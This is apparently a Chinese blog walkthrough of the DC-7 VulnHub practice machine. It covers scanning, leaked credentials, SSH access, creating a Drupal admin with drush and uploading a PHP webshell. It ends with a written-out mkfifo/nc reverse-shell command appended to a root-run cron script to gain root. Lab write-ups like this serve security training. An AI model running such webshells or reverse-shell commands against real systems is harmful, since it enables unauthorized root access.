Kali渗透DC7

已于 2022-03-30 21:27:59 修改
阅读量4k 收藏
点赞数
文章标签: 网络安全
于 2022-03-30 21:00:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50905066/article/details/123856864
版权

相同步骤,从官网下载靶机,设置网卡为nat开始靶机,同时启动Kali,使用nmap发现主机

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16

得到主机地址,进一步扫描,搜集靶机开启的服务与端口

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

靶机开启了ssh服务22端口,http服务80端口。打开浏览器访问靶机http服务

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

成功访问,发现搜索框,继续搜集信息查看是否有sql注入等漏洞

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

发现登陆框,但没有注入漏洞无法登陆,发现网页下面有dc7user,搜索信息

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

发现源码,查看配置源码

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

得到一个账户名与密码,尝试登录该网页

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

登录失败,再次尝试通过ssh登录靶机

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

成功登陆!查看用户信息,逐个查看文件

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

最终在该用户目录下发现mbox 文件,信息提示/opt/scripts/backups.sh该文件可以以dc7的root权限执行,查看该文件内容

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16

百度查询文件中的drush 命令可以帮我们创建用户。进入/bar/www/html使用该命令创建用户

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16

成功创建,尝试登录靶机的http服务

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

成功登陆,尝试寻找上传路径,进行木马上传

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

发现无法上传,该网页不支持php 文件,尝试安装插件,

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

成功安装插件,尝试Php木马上传靶机网站是否执行

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

成功执行,打开Kali ssh尝试木马链接

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_17,color_FFFFFF,t_70,g_se,x_16 

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

链接成功,输入命令获得交互界面

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16 

查看文件

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16

发现backups.sh 在该用户目录下。用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.172.131 2345 >/tmp/f" >> backups.sh将反弹shell的命令写入到backups.sh文件中,当它定时自动执行时即可执行其中的反弹shell语句,即可反弹回shell,返回之后既是root权限,在root目录下找到flag。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDlhqzpm6rlrqI,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

冬雪客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-7靶机实战练习
千寻的博客
03-23 1229
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.146.138 Kali的IP地址:192.168.146.130 文章目录第一部分 信息收集第一步 扫描主机第二步 扫描端口第三步 收集网站信息第四步 访问80端口第五步 收集@DC7USER信息第六步 下载源码 收集文...
渗透测试:DC-7靶机
Ciyaso的博客
08-23 273
一、扫描获取靶机ip arp-scan -l 192.168.203.146 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.146 开放22、80端口 2.Wappaloyzer CMS:Drupal 8 Web服务器:Apache 2.4.25 操作系统:Debian 访问网站 提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工) 发现一个@用户 @DC7USER 搜索一下发现了一个github用户
渗透项目】靶机DC-7渗透过程
命运的旋律的博客
05-10 694
信息收集 主机发现 靶机测试常规起手式:) nmap -sn 192.168.72.0/24 -sn和-sP都是对主机进行ping扫描 端口扫描 nmap -Pn -T4 -A -v -p- 192.168.189.137 --script=vuln 网站指纹扫描 通过网站指纹扫描发现该网站的中间件使用了apache2.4.25,使用的CMS是Drupal 8 python3 cmseek.py -u 192.168.189.137 使用searchsploit和msfconsole也没
vulnhub之dc7
qq_54030686的博客
06-16 179
这个靶场本身的难度还可以,主要是它会一直提示你,这种查找源码泄露的方法,在实际中测试中有可能会用到 描述一下整体思路话不多说,操作 主机发现,端口扫描 22端口爆破,未发现弱口令 指纹识别,发现目标为Drupal 8框架 尝试 exploit-db和msf漏洞利用 ![在这里插入图片描述](https://img-blog.csdnimg.cn/3ae9 msf中自带的还是exploit-db上存在的,个人都进行尝试,利用失败 查看界面下方,存在所属厂商 github查找相应资源 在文件的config配置
DC-7靶机渗透
m0_62008601的博客
06-02 1036
dc-7靶机的渗透过程
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Kali渗透系统2018.1
06-13
Kali渗透系统,版本是2018.1,经过虚拟机测试,亲测可用。
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
KALi 渗透测试
09-13
通过kali系统详细的介绍渗透测试过程,通过工具渗透,带来渗透测试思路
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
DC7靶机渗透测试
Huangshanyoumu的博客
04-17 318
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞扫描/利用1.访问靶机 web 服务2.信息收集3.ssh 连接4.查看文件权限5.查看文件内容7.利用框架漏洞8.安装 PHP 插件10.漏洞利用总结: 环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-7(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 发现靶机 ip:192.168.1.126 2.端口扫描 发现其开放了 22 ssh、80 web drupal 二、漏洞扫描/利用 1.
DC7_靶场实战
JSH_CDX的博客
03-30 1361
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
DC:7靶机-Walkthrough
ins1ght的博客
09-23 2450
目前为止,做过的vlunhub里面的靶机里,这个算是比较开脑洞的了。首先发现网站首页footer部分多出的一个@DC7USER,这与一个未经DIY的Drupal站点的footer展示内容不同,进而通过Google搜索发现了放在Github上的系统登录口令,才有了后续的一系列操作。回忆起之前在某CTF大赛中打酱油的经历,那个时候也有一道Web题目,也是通过放在Github上的一个项目为突破口。历史真是TM惊人的相似……
dc-7 靶机渗透学习
..
03-23 3915
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
DC-7靶机
m0_62094846的博客
07-05 233
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.136 -p- -oN nmap136.Anmap -A -T4 192.168.61.136 -p- -oN nmap136.A有22和80端口下面有提示DC7USER百度一下可以下载一个文件这里也说明是重要点下载到kali本地git clone https://github.com/Dc7User/staffdbcd s
DC-7靶机练习
IWANnaaa的博客
11-03 215
DC-7靶场练习
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1080
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1058
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
kali渗透centos7
最新发布
03-07
Kali Linux是一种专门用于渗透测试和网络安全的操作系统,而CentOS 7是一种基于Linux的服务器操作系统。在使用Kali Linux进行渗透测试时,你可以通过以下步骤来渗透CentOS 7系统: 1. 信息收集:使用Kali Linux中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值